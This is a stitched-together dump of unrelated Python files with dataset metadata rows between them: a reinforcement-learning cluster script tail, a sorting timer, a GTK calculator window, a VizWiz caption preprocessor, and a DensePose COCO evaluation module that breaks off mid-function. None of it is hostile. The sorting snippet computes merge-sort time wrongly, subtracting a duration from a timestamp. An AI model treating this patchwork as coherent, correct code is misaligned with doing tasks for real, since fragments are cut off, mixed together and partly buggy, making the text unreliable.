# break while loop when end of this episode
# if done and q_table.loc[str(state),action]!=0:
# break
cost_all_list.append(cost_all)
print("epoch:", episode+1)
print("The number of cycles in this epoch:", sum)
print("The reward list:", reward_list)
print("The best reward in this epoch:", max(reward_list))
print("The final reward in this epoch:", reward)
print("The final cost in this epoch:", cost_all)
print("当前状态与初始状态的差别", (different_init))
print("当前状态与初始状态的差别数", len(different_init))
print("epoch_time:", epoch_time, "\n")
# end of game
# print("final state:\n",state)
print("------------------------")
print("The final state_array:", state__arr)
print("The final cost:", cost_all)
# if state.equals(env.state_init):
# print("True")
# else:
# print("False")
# assert_frame_equal(state,env.state_init)
# env.destroy()
return cost_all_list, reward_all_list
if __name__ == "__main__":
improve_list = []
test_number = 50
state_init = state_init()
# for i in range(50):
# print("第%d次测试:" % (i+1))
episodes = np.arange(20000)
curr_time1 = datetime.datetime.now()
# print(len(state_init))
server_attribute = pd.DataFrame(np.array([0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,
0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0,
1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,
0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1]).
reshape(4, 12),
columns=np.arange(12))
env = Cluster(state_init, server_attribute)
init_reward = env.reward(env.cost_all(env.cost_init), env.state_init)
RL = QLearningTable(actions=list(range(env.n_actions)))
# env.after(100, update)
# env.mainloop()
cost_all_list, reward_all_list = update()
print("len(reward_all_list)", len(reward_all_list))
curr_time2 = datetime.datetime.now()
train_time = curr_time2-curr_time1
print("The training time:", train_time)
print("\n")
improve = ((reward_all_list[-1] - init_reward)/init_reward)*100
print("The improve percent:", improve, "%")
improve_list.append(improve)
y_1 = reward_all_list
y_all_list = y_1
x = (np.arange(len(y_all_list))+1)*100
y = y_all_list
y1 = [init_reward]*len(x)
fig = plt.Figure(figsize=(7, 5))
pl.plot(x, y, label=u'RL')
pl.legend()
pl.plot(x, y1, label=u'Init')
pl.legend()
pl.xlabel(u"epoch", size=14)
pl.ylabel(u"reward", size=14)
plt.show()
# y = improve_list
# x = np.arange(test_number)
# fig = plt.Figure(figsize=(7, 5))
# pl.plot(x, y, label=u'Improve')
# pl.legend()
# plt.show() | 35.314917 | 149 | 0.57525 |
79545033756f34edaa344527e0762a3514ed038a | 446 | py | Python | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | from insertion import insertion_sort
from merge import merge_sort
import random
import time
if __name__ == '__main__':
items=[random.randint(-50,100) for c in range (1000)]
items2 = items
start = time.time()
insertion_sort(items)
insertiontime = time.time()-start
print "Insertion Sort Time = " , insertiontime
merge_sort(items2)
mergetime = time.time()-insertiontime
print "Merge Sort Time = " , mergetime
| 24.777778 | 57 | 0.701794 |
79545034b7eb157c095c153d3aca72f2b70189ff | 4,427 | py | Python | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null |
from gettext import gettext as _
import struct
from gi.repository import Gtk, Gdk, Gio, GLib
from . import app_info
from .settings import settings
from .common import WIDGET_SPACING
from .calculator import Calculator
from .notebook import Notebook
_C_INT_MAX = 2 ** (struct.Struct('i').size * 8 - 1) - 1
class MainWindow(Gtk.ApplicationWindow):
def __init__(self, app):
super().__init__(
application=app,
title=app_info.TITLE
)
self._maximized = False
grid = Gtk.Grid(
orientation=Gtk.Orientation.VERTICAL
)
self.add(grid)
grid.add(self._create_menubar())
self._calculator = Calculator()
self._calculator.props.margin = WIDGET_SPACING
grid.add(self._calculator)
self._notebook = Notebook(self._calculator)
grid.add(self._notebook)
grid.show_all()
self._notebook.hide()
notebook_visible_action = Gio.SimpleAction.new_stateful(
'notebook-visible',
None,
GLib.Variant.new_boolean(self._notebook.get_visible()),
)
notebook_visible_action.connect(
'change-state', self._on_notebook_visible_toggle)
self.add_action(notebook_visible_action)
def _create_menubar(self):
ag = Gtk.AccelGroup()
self.add_accel_group(ag)
menubar = Gtk.MenuBar()
# File
file_menu = Gtk.Menu()
mi_file = Gtk.MenuItem.new_with_mnemonic(_('_File'))
mi_file.set_submenu(file_menu)
menubar.append(mi_file)
mi_quit = Gtk.MenuItem(
label=_('Quit'),
action_name='app.quit')
key, mod = Gtk.accelerator_parse('<Control>Q')
mi_quit.add_accelerator(
'activate', ag, key, mod, Gtk.AccelFlags.VISIBLE)
file_menu.append(mi_quit)
# View
view_menu = Gtk.Menu()
mi_view = Gtk.MenuItem.new_with_mnemonic(_('_View'))
mi_view.set_submenu(view_menu)
menubar.append(mi_view)
mi_show_equations = Gtk.CheckMenuItem(
label=_('Equations'),
action_name='win.notebook-visible')
view_menu.append(mi_show_equations)
# Help
help_menu = Gtk.Menu()
mi_help = Gtk.MenuItem.new_with_mnemonic(_('_Help'))
mi_help.set_submenu(help_menu)
menubar.append(mi_help)
mi_about = Gtk.MenuItem(
label=_('About'),
action_name='app.about')
help_menu.append(mi_about)
return menubar
def _udpate_geometry_hints(self):
geometry = Gdk.Geometry()
geometry.max_width = _C_INT_MAX
if self._notebook.get_visible():
geometry.max_height = _C_INT_MAX
else:
geometry.max_height = -1
self.set_geometry_hints(None, geometry, Gdk.WindowHints.MAX_SIZE)
def _on_notebook_visible_toggle(self, action, value):
action.set_state(value)
self._notebook.set_visible(value.get_boolean())
self._udpate_geometry_hints()
def do_window_state_event(self, event):
self._maximized = bool(
event.new_window_state & Gdk.WindowState.MAXIMIZED)
return Gtk.ApplicationWindow.do_window_state_event(self, event)
def do_delete_event(self, event):
self.save_state()
return Gdk.EVENT_PROPAGATE
def save_state(self):
state = {}
notebook_visible_state = self.get_action_state('notebook-visible')
state['show_equations'] = notebook_visible_state.get_boolean()
state['x'], state['y'] = self.get_position()
state['width'], state['height'] = self.get_size()
state['maximized'] = self._maximized
settings['window'] = state
self._calculator.save_state()
self._notebook.save_state()
def load_state(self):
self._calculator.load_state()
self._notebook.load_state()
try:
state = settings['window']
if state['maximized']:
self.maximize()
else:
self.move(state['x'], state['y'])
self.resize(
state['width'], state['height'])
self.change_action_state(
'notebook-visible',
GLib.Variant.new_boolean(state['show_equations']))
except (KeyError, TypeError):
pass
| 28.56129 | 74 | 0.609894 |
795450bd826ba6f14b9211ede68f06d2e6f78b44 | 11,746 | py | Python | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | """
Preprocess a raw json dataset into hdf5/json files for use in data_loader.lua
Input: json file that has the form
[{ file_path: 'path/img.jpg', captions: ['a caption', ...] }, ...]
example element in this list would look like
{'captions': [u'A man with a red helmet on a small moped on a dirt road. ', u'Man riding a motor bike on a dirt road on the countryside.', u'A man riding on the back of a motorcycle.', u'A dirt path with a young person on a motor bike rests to the foreground of a verdant area with a bridge and a background of cloud-wreathed mountains. ', u'A man in a red shirt and a red hat is on a motorcycle on a hill side.'], 'file_path': u'val2014/COCO_val2014_000000391895.jpg', 'id': 391895}
This script reads this json, does some basic preprocessing on the captions
(e.g. lowercase, etc.), creates a special UNK token, and encodes everything to arrays
Output: a json file and an hdf5 file
The hdf5 file contains several fields:
/images is (N,3,256,256) uint8 array of raw image data in RGB format
/labels is (M,max_length) uint32 array of encoded labels, zero padded
/label_start_ix and /label_end_ix are (N,) uint32 arrays of pointers to the
first and last indices (in range 1..M) of labels for each image
/label_length stores the length of the sequence for each of the M sequences
The json file has a dict that contains:
- an 'ix_to_word' field storing the vocab in form {ix:'word'}, where ix is 1-indexed
- an 'images' field that is a list holding auxiliary information for each image,
such as in particular the 'split' it was assigned to.
"""
### source activate py2.7 ###
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import sys
import re
import argparse
from random import shuffle, seed
import string
# non-standard dependencies:
import h5py
import numpy as np
import skimage.io
from PIL import Image
sys.path.append('/home/yz9244/Up-Down-Captioner/external/coco/PythonAPI/')
from pycocotools.coco import COCO
VizWiz_ANN_PATH = '/home/yz9244/Up-Down-Captioner/bottom-up-attention/data/VizWiz/annotations/'
COCO_TRAIN_VOCAB_PATH = '/home/yz9244/AoANet/data/cocotalk_vocab.json'
corrupt_list = [37093]
SENTENCE_SPLIT_REGEX = re.compile(r'(\W+)') # Split on any non-alphanumeric character
def split_sentence(sentence):
""" break sentence into a list of words and punctuation """
toks = []
for word in [s.strip().lower() for s in SENTENCE_SPLIT_REGEX.split(sentence.strip()) if len(s.strip()) > 0]:
# Break up any words containing punctuation only, e.g. '!?', unless it is multiple full stops e.g. '..'
if all(c in string.punctuation for c in word) and not all(c in '.' for c in word):
toks += list(word)
else:
toks.append(word)
# Remove '.' from the end of the sentence -
# this is EOS token that will be populated by data layer
if toks[-1] != '.':
return toks
return toks[:-1]
def load_caption_vocab(vocab_path=COCO_TRAIN_VOCAB_PATH):
info = json.load(open(vocab_path))
ix_to_word = info['ix_to_word']
vocab = []
vocab_size = len(ix_to_word)
for i in range(vocab_size):
vocab.append(ix_to_word[str(i+1)])
return vocab
def build_vocab(params, data_split, base_vocab=None):
count_thr = params['word_count_threshold']
counts = {}
for dataset in data_split: # coco sources
annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
coco = COCO(annFile)
# Count word frequencies
for image_id,anns in coco.imgToAnns.iteritems():
if image_id in corrupt_list:
continue
for ann in anns:
caption_sequence = split_sentence(ann['caption'])
for word in caption_sequence:
w = word.strip()
counts[w] = counts.get(w, 0) + 1
# count up the number of words
cw = sorted([(count,w) for w,count in counts.items()], reverse=True)
print('top words and their counts:')
print('\n'.join(map(str,cw[:20])))
# print some stats
total_words = sum(counts.values())
print('total words:', total_words)
bad_words = [w for w,n in counts.items() if n <= count_thr]
vocab = [w for w,n in counts.items() if n > count_thr]
bad_count = sum(counts[w] for w in bad_words)
print('number of bad words: %d/%d = %.2f%%' % (len(bad_words), len(counts), len(bad_words)*100.0/len(counts)))
print('number of words in vocab would be %d' % (len(vocab), ))
print('number of UNKs: %d/%d = %.2f%%' % (bad_count, total_words, bad_count*100.0/total_words))
# lets look at the distribution of lengths as well
sent_lengths = {}
for dataset in data_split: # coco sources
annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
coco = COCO(annFile)
# Count word frequencies
for image_id,anns in coco.imgToAnns.iteritems():
if image_id in corrupt_list:
continue
for ann in anns:
caption_sequence = split_sentence(ann['caption'])
nw = len(caption_sequence)
sent_lengths[nw] = sent_lengths.get(nw, 0) + 1
max_len = max(sent_lengths.keys())
print('max length sentence in raw data: ', max_len)
print('sentence length distribution (count, number of words):')
sum_len = sum(sent_lengths.values())
for i in range(max_len+1):
print('%2d: %10d %f%%' % (i, sent_lengths.get(i,0), sent_lengths.get(i,0)*100.0/sum_len))
# lets now produce the final annotations
# additional special UNK token we will use below to map infrequent words to
print('inserting the special UNK token')
vocab.append('UNK')
if base_vocab:
vocabulary = load_caption_vocab(vocab_path=base_vocab)
if vocabulary[-1] == 'UNK':
vocabulary.pop()
else:
vocabulary = []
offset = len(vocabulary)
print("number of words in the base vocab: %d\n" % (offset))
for word in vocab:
if word in vocabulary:
continue
vocabulary.append(word)
offset += 1
print("number of words in the final vocab: %d\n" % (offset))
return vocabulary
def encode_captions(params, data_split, wtoi):
"""
encode all captions into one large array, which will be 1-indexed.
also produces label_start_ix and label_end_ix which store 1-indexed
and inclusive (Lua-style) pointers to the first and last caption for
each image in the dataset.
"""
max_length = params['max_length']
img_count = 0
caption_count = 0
for dataset in data_split:
annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
coco = COCO(annFile)
for image_id,anns in coco.imgToAnns.iteritems():
if image_id in corrupt_list:
continue
img_count += 1
caption_count += len(anns)
N = img_count
M = caption_count # total number of captions
label_arrays = []
label_start_ix = np.zeros(N, dtype='uint32') # note: these will be one-indexed
label_end_ix = np.zeros(N, dtype='uint32')
label_length = np.zeros(M, dtype='uint32')
caption_counter = 0
counter = 1
img_counter = 0
imgInfo = []
for dataset in data_split:
annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
coco = COCO(annFile)
for image_id,anns in coco.imgToAnns.iteritems():
if image_id in corrupt_list:
continue
image_info = coco.imgs[image_id]
#image_path = '%s/%s' % (image_info['file_name'].split('_')[1], image_info['file_name'])
image_path = '%s' % (image_info['file_name'])
jimg = {}
if dataset == 'train' or dataset == 'val':
jimg['split'] = 'train'
elif dataset == 'test':
jimg['split'] = 'test'
jimg['file_path'] = image_path
jimg['id'] = image_info['id']
n = len(anns)
assert n > 0, 'error: some image has no captions'
Li = np.zeros((n, max_length), dtype='uint32')
for j, ann in enumerate(anns):
caption_sequence = split_sentence(ann['caption'])
label_length[caption_counter] = min(max_length, len(caption_sequence))
caption_counter += 1
for k,w in enumerate(caption_sequence):
if k < max_length:
if not w in wtoi:
w = 'UNK'
Li[j,k] = wtoi[w]
# note: word indices are 1-indexed, and captions are padded with zeros
label_arrays.append(Li)
label_start_ix[img_counter] = counter
label_end_ix[img_counter] = counter + n - 1
img_counter += 1
counter += n
imgInfo.append(jimg)
L = np.concatenate(label_arrays, axis=0) # put all the labels together
assert L.shape[0] == M, 'lengths don\'t match? that\'s weird'
assert np.all(label_length > 0), 'error: some caption had no words?'
print('encoded captions to array of size ', L.shape)
return N, L, label_start_ix, label_end_ix, label_length, imgInfo
def main(params):
seed(123) # make reproducible
# create the vocab
vocab = build_vocab(params, ['train', 'val'])
itow = {i+1:w for i,w in enumerate(vocab)} # a 1-indexed vocab translation table
wtoi = {w:i+1 for i,w in enumerate(vocab)} # inverse table
# encode captions in large arrays, ready to ship to hdf5 file
N, L, label_start_ix, label_end_ix, label_length, imgInfo = encode_captions(params, ['train', 'val', 'test'], wtoi)
# create output h5 file
f_lb = h5py.File(params['output_h5']+'_label.h5', "w")
f_lb.create_dataset("labels", dtype='uint32', data=L)
f_lb.create_dataset("label_start_ix", dtype='uint32', data=label_start_ix)
f_lb.create_dataset("label_end_ix", dtype='uint32', data=label_end_ix)
f_lb.create_dataset("label_length", dtype='uint32', data=label_length)
f_lb.close()
# create output json file
out = {}
out['ix_to_word'] = itow # encode the (1-indexed) vocab
out['images'] = imgInfo
json.dump(out, open(params['output_json']+'.json', 'w'))
print('wrote ', params['output_json']+'.json')
# create the vocab integrating MSCOCO
vocab = build_vocab(params, ['train', 'val'], base_vocab=COCO_TRAIN_VOCAB_PATH)
itow = {i+1:w for i,w in enumerate(vocab)} # a 1-indexed vocab translation table
wtoi = {w:i+1 for i,w in enumerate(vocab)} # inverse table
# encode captions in large arrays, ready to ship to hdf5 file
N, L, label_start_ix, label_end_ix, label_length, imgInfo = encode_captions(params, ['train', 'val', 'test'], wtoi)
# create output h5 file
f_lb = h5py.File(params['output_h5']+'_withCOCO_label.h5', "w")
f_lb.create_dataset("labels", dtype='uint32', data=L)
f_lb.create_dataset("label_start_ix", dtype='uint32', data=label_start_ix)
f_lb.create_dataset("label_end_ix", dtype='uint32', data=label_end_ix)
f_lb.create_dataset("label_length", dtype='uint32', data=label_length)
f_lb.close()
# create output json file
out = {}
out['ix_to_word'] = itow # encode the (1-indexed) vocab
out['images'] = imgInfo
json.dump(out, open(params['output_json']+'_withCOCO.json', 'w'))
print('wrote ', params['output_json']+'_withCOCO.json')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# input json
parser.add_argument('--output_json', default='data/vizwiztalk', help='output json file')
parser.add_argument('--output_h5', default='data/vizwiztalk', help='output h5 file')
parser.add_argument('--images_root', default='', help='root location in which images are stored, to be prepended to file_path in input json')
# options
parser.add_argument('--max_length', default=16, type=int, help='max length of a caption, in number of words. captions longer than this get clipped.')
parser.add_argument('--word_count_threshold', default=5, type=int, help='only words that occur more than this number of times will be put in vocab')
args = parser.parse_args()
params = vars(args) # convert to ordinary dict
print('parsed input parameters:')
print(json.dumps(params, indent = 2))
main(params)
| 40.926829 | 483 | 0.693002 |
7954516a71d606bef1c136ae7aa4dadc8bac0938 | 52,557 | py | Python | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# This is a modified version of cocoeval.py where we also have the densepose evaluation.
__author__ = "tsungyi"
import copy, pdb
import datetime
import logging
import numpy as np
import pickle
import time
from collections import defaultdict
from enum import Enum
from typing import Any, Dict, Tuple
import scipy.spatial.distance as ssd
from pycocotools import mask as maskUtils
from scipy.io import loadmat
from scipy.ndimage import zoom as spzoom
from detectron2.utils.file_io import PathManager
from densepose.structures.mesh import create_mesh
from .data.structures import DensePoseDataRelative
logger = logging.getLogger(__name__)
class DensePoseEvalMode(str, Enum):
# use both masks and geodesic distances (GPS * IOU) to compute scores
GPSM = "gpsm"
# use only geodesic distances (GPS) to compute scores
GPS = "gps"
# use only masks (IOU) to compute scores
IOU = "iou"
class DensePoseDataMode(str, Enum):
# use estimated IUV data (default mode)
IUV_DT = "iuvdt"
# use ground truth IUV data
IUV_GT = "iuvgt"
# use ground truth labels I and set UV to 0
I_GT_UV_0 = "igtuv0"
# use ground truth labels I and estimated UV coordinates
I_GT_UV_DT = "igtuvdt"
# use estimated labels I and set UV to 0
I_DT_UV_0 = "idtuv0"
class DensePoseCocoEval(object):
# Interface for evaluating detection on the Microsoft COCO dataset.
#
# The usage for CocoEval is as follows:
# cocoGt=..., cocoDt=... # load dataset and results
# E = CocoEval(cocoGt,cocoDt); # initialize CocoEval object
# E.params.recThrs = ...; # set parameters as desired
# E.evaluate(); # run per image evaluation
# E.accumulate(); # accumulate per image results
# E.summarize(); # display summary metrics of results
# For example usage see evalDemo.m and http://mscoco.org/.
#
# The evaluation parameters are as follows (defaults in brackets):
# imgIds - [all] N img ids to use for evaluation
# catIds - [all] K cat ids to use for evaluation
# iouThrs - [.5:.05:.95] T=10 IoU thresholds for evaluation
# recThrs - [0:.01:1] R=101 recall thresholds for evaluation
# areaRng - [...] A=4 object area ranges for evaluation
# maxDets - [1 10 100] M=3 thresholds on max detections per image
# iouType - ['segm'] set iouType to 'segm', 'bbox', 'keypoints' or 'densepose'
# iouType replaced the now DEPRECATED useSegm parameter.
# useCats - [1] if true use category labels for evaluation
# Note: if useCats=0 category labels are ignored as in proposal scoring.
# Note: multiple areaRngs [Ax2] and maxDets [Mx1] can be specified.
#
# evaluate(): evaluates detections on every image and every category and
# concats the results into the "evalImgs" with fields:
# dtIds - [1xD] id for each of the D detections (dt)
# gtIds - [1xG] id for each of the G ground truths (gt)
# dtMatches - [TxD] matching gt id at each IoU or 0
# gtMatches - [TxG] matching dt id at each IoU or 0
# dtScores - [1xD] confidence of each dt
# gtIgnore - [1xG] ignore flag for each gt
# dtIgnore - [TxD] ignore flag for each dt at each IoU
#
# accumulate(): accumulates the per-image, per-category evaluation
# results in "evalImgs" into the dictionary "eval" with fields:
# params - parameters used for evaluation
# date - date evaluation was performed
# counts - [T,R,K,A,M] parameter dimensions (see above)
# precision - [TxRxKxAxM] precision for every evaluation setting
# recall - [TxKxAxM] max recall for every evaluation setting
# Note: precision and recall==-1 for settings with no gt objects.
#
# See also coco, mask, pycocoDemo, pycocoEvalDemo
#
# Microsoft COCO Toolbox. version 2.0
# Data, paper, and tutorials available at: http://mscoco.org/
# Code written by Piotr Dollar and Tsung-Yi Lin, 2015.
# Licensed under the Simplified BSD License [see coco/license.txt]
def __init__(
self,
cocoGt=None,
cocoDt=None,
iouType: str = "densepose",
dpEvalMode: DensePoseEvalMode = DensePoseEvalMode.GPS,
dpDataMode: DensePoseDataMode = DensePoseDataMode.IUV_DT,
):
"""
Initialize CocoEval using coco APIs for gt and dt
:param cocoGt: coco object with ground truth annotations
:param cocoDt: coco object with detection results
:return: None
"""
self.cocoGt = cocoGt # ground truth COCO API
self.cocoDt = cocoDt # detections COCO API
self._dpEvalMode = dpEvalMode
self._dpDataMode = dpDataMode
self.params = {} # evaluation parameters
self.evalImgs = defaultdict(list) # per-image per-category eval results [KxAxI]
self.eval = {} # accumulated evaluation results
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
self.params = Params(iouType=iouType) # parameters
self._paramsEval = {} # parameters for evaluation
self.stats = [] # result summarization
self.ious = {} # ious between all gts and dts
if cocoGt is not None:
self.params.imgIds = sorted(cocoGt.getImgIds())
self.params.catIds = sorted(cocoGt.getCatIds())
self.ignoreThrBB = 0.7
self.ignoreThrUV = 0.9
def _loadGEval(self):
smpl_subdiv_fpath = PathManager.get_local_path(
"https://dl.fbaipublicfiles.com/densepose/data/SMPL_subdiv.mat"
)
pdist_transform_fpath = PathManager.get_local_path(
"https://dl.fbaipublicfiles.com/densepose/data/SMPL_SUBDIV_TRANSFORM.mat"
)
pdist_matrix_fpath = PathManager.get_local_path(
"https://dl.fbaipublicfiles.com/densepose/data/Pdist_matrix.pkl", timeout_sec=120
)
SMPL_subdiv = loadmat(smpl_subdiv_fpath)
self.PDIST_transform = loadmat(pdist_transform_fpath)
self.PDIST_transform = self.PDIST_transform["index"].squeeze()
UV = np.array([SMPL_subdiv["U_subdiv"], SMPL_subdiv["V_subdiv"]]).squeeze()
ClosestVertInds = np.arange(UV.shape[1]) + 1
self.Part_UVs = []
self.Part_ClosestVertInds = []
for i in np.arange(24):
self.Part_UVs.append(UV[:, SMPL_subdiv["Part_ID_subdiv"].squeeze() == (i + 1)])
self.Part_ClosestVertInds.append(
ClosestVertInds[SMPL_subdiv["Part_ID_subdiv"].squeeze() == (i + 1)]
)
with open(pdist_matrix_fpath, "rb") as hFile:
arrays = pickle.load(hFile, encoding="latin1")
self.Pdist_matrix = arrays["Pdist_matrix"]
self.Part_ids = np.array(SMPL_subdiv["Part_ID_subdiv"].squeeze())
# Mean geodesic distances for parts.
self.Mean_Distances = np.array([0, 0.351, 0.107, 0.126, 0.237, 0.173, 0.142, 0.128, 0.150])
# Coarse Part labels.
self.CoarseParts = np.array(
[0, 1, 1, 2, 2, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8]
)
def _prepare(self):
"""
Prepare ._gts and ._dts for evaluation based on params
:return: None
"""
def _toMask(anns, coco):
# modify ann['segmentation'] by reference
for ann in anns:
# safeguard for invalid segmentation annotation;
# annotations containing empty lists exist in the posetrack
# dataset. This is not a correct segmentation annotation
# in terms of COCO format; we need to deal with it somehow
segm = ann["segmentation"]
if type(segm) == list and len(segm) == 0:
ann["segmentation"] = None
continue
rle = coco.annToRLE(ann)
ann["segmentation"] = rle
def _getIgnoreRegion(iid, coco):
img = coco.imgs[iid]
if "ignore_regions_x" not in img.keys():
return None
if len(img["ignore_regions_x"]) == 0:
return None
rgns_merged = [
[v for xy in zip(region_x, region_y) for v in xy]
for region_x, region_y in zip(img["ignore_regions_x"], img["ignore_regions_y"])
]
rles = maskUtils.frPyObjects(rgns_merged, img["height"], img["width"])
rle = maskUtils.merge(rles)
return maskUtils.decode(rle)
def _checkIgnore(dt, iregion):
if iregion is None:
return True
bb = np.array(dt["bbox"]).astype(np.int)
x1, y1, x2, y2 = bb[0], bb[1], bb[0] + bb[2], bb[1] + bb[3]
x2 = min([x2, iregion.shape[1]])
y2 = min([y2, iregion.shape[0]])
if bb[2] * bb[3] == 0:
return False
crop_iregion = iregion[y1:y2, x1:x2]
if crop_iregion.sum() == 0:
return True
if "densepose" not in dt.keys(): # filtering boxes
return crop_iregion.sum() / bb[2] / bb[3] < self.ignoreThrBB
# filtering UVs
ignoremask = np.require(crop_iregion, requirements=["F"])
mask = self._extract_mask(dt)
uvmask = np.require(np.asarray(mask > 0), dtype=np.uint8, requirements=["F"])
uvmask_ = maskUtils.encode(uvmask)
ignoremask_ = maskUtils.encode(ignoremask)
uviou = maskUtils.iou([uvmask_], [ignoremask_], [1])[0]
return uviou < self.ignoreThrUV
p = self.params
if p.useCats:
gts = self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
dts = self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
else:
gts = self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds))
dts = self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds))
imns = self.cocoGt.loadImgs(p.imgIds)
self.size_mapping = {}
for im in imns:
self.size_mapping[im["id"]] = [im["height"], im["width"]]
# if iouType == 'uv', add point gt annotations
if p.iouType == "densepose":
self._loadGEval()
# convert ground truth to mask if iouType == 'segm'
if p.iouType == "segm":
_toMask(gts, self.cocoGt)
_toMask(dts, self.cocoDt)
# set ignore flag
for gt in gts:
gt["ignore"] = gt["ignore"] if "ignore" in gt else 0
gt["ignore"] = "iscrowd" in gt and gt["iscrowd"]
if p.iouType == "keypoints":
gt["ignore"] = (gt["num_keypoints"] == 0) or gt["ignore"]
if p.iouType == "densepose":
gt["ignore"] = ("dp_x" in gt) == 0
if p.iouType == "segm":
gt["ignore"] = gt["segmentation"] is None
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
self._igrgns = defaultdict(list)
for gt in gts:
iid = gt["image_id"]
if iid not in self._igrgns.keys():
self._igrgns[iid] = _getIgnoreRegion(iid, self.cocoGt)
if _checkIgnore(gt, self._igrgns[iid]):
self._gts[iid, gt["category_id"]].append(gt)
for dt in dts:
iid = dt["image_id"]
if (iid not in self._igrgns) or _checkIgnore(dt, self._igrgns[iid]):
self._dts[iid, dt["category_id"]].append(dt)
self.evalImgs = defaultdict(list) # per-image per-category evaluation results
self.eval = {} # accumulated evaluation results
def evaluate(self):
"""
Run per image evaluation on given images and store results (a list of dict) in self.evalImgs
:return: None
"""
tic = time.time()
logger.info("Running per image DensePose evaluation... {}".format(self.params.iouType))
p = self.params
# add backward compatibility if useSegm is specified in params
if p.useSegm is not None:
p.iouType = "segm" if p.useSegm == 1 else "bbox"
logger.info("useSegm (deprecated) is not None. Running DensePose evaluation")
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params = p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
if p.iouType in ["segm", "bbox"]:
computeIoU = self.computeIoU
elif p.iouType == "keypoints":
computeIoU = self.computeOks
elif p.iouType == "densepose":
computeIoU = self.computeOgps
if self._dpEvalMode == DensePoseEvalMode.GPSM:
self.real_ious = {
(imgId, catId): self.computeDPIoU(imgId, catId)
for imgId in p.imgIds
for catId in catIds
}
# pdb.set_trace()
self.ious = {
(imgId, catId): computeIoU(imgId, catId) for imgId in p.imgIds for catId in catIds
}
evaluateImg = self.evaluateImg
maxDet = p.maxDets[-1]
self.evalImgs = [
evaluateImg(imgId, catId, areaRng, maxDet)
for catId in catIds
for areaRng in p.areaRng
for imgId in p.imgIds
]
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
logger.info("DensePose evaluation DONE (t={:0.2f}s).".format(toc - tic))
def getDensePoseMask(self, polys):
maskGen = np.zeros([256, 256])
stop = min(len(polys) + 1, 15)
for i in range(1, stop):
if polys[i - 1]:
currentMask = maskUtils.decode(polys[i - 1])
maskGen[currentMask > 0] = i
return maskGen
def _generate_rlemask_on_image(self, mask, imgId, data):
bbox_xywh = np.array(data["bbox"])
x, y, w, h = bbox_xywh
im_h, im_w = self.size_mapping[imgId]
im_mask = np.zeros((im_h, im_w), dtype=np.uint8)
if mask is not None:
x0 = max(int(x), 0)
x1 = min(int(x + w), im_w, int(x) + mask.shape[1])
y0 = max(int(y), 0)
y1 = min(int(y + h), im_h, int(y) + mask.shape[0])
y = int(y)
x = int(x)
im_mask[y0:y1, x0:x1] = mask[y0 - y : y1 - y, x0 - x : x1 - x]
im_mask = np.require(np.asarray(im_mask > 0), dtype=np.uint8, requirements=["F"])
rle_mask = maskUtils.encode(np.array(im_mask[:, :, np.newaxis], order="F"))[0]
return rle_mask
def computeDPIoU(self, imgId, catId):
p = self.params
if p.useCats:
gt = self._gts[imgId, catId]
dt = self._dts[imgId, catId]
else:
gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]
